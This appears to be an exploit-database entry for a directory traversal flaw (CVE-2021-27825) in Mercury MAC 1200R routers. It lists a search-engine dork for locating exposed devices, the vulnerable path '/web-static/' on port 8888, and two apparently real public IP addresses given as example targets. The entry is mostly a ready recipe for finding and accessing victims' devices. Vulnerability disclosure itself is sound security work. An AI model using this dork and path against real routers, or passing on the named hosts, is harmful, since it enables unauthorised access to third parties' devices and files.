MAC 1200R - Directory Traversal

Author: Chunlei Shang_ Jiangsu Public Information Co._ Ltd.
type: webapps
platform: hardware
port: 
date_added: 2023-04-07  
date_updated: 2023-04-07  
verified: 0  
codes: CVE-2021-27825  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 51315.txt  

# Exploit Title: MAC 1200R - Directory Traversal
# Google Dork: "MAC1200R" && port="8888"
# Date: 2023/03/09
# Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd.
# Vendor Homepage: https://www.mercurycom.com.cn/
# Software Link: https://www.mercurycom.com.cn/product-1-1.html
# Version: all versions. (REQUIRED)
# Tested on: all versions.
# CVE : CVE-2021-27825

1. Attackers can easily find the targets through various search engines with keywords "MAC1200R" && port="8888".
2. Open the affected website like "http://IP:8888/web-static/".
3. For example:
1）http://60.251.151.2:8888/web-static/

2）http://222.215.15.70:8888/web-static/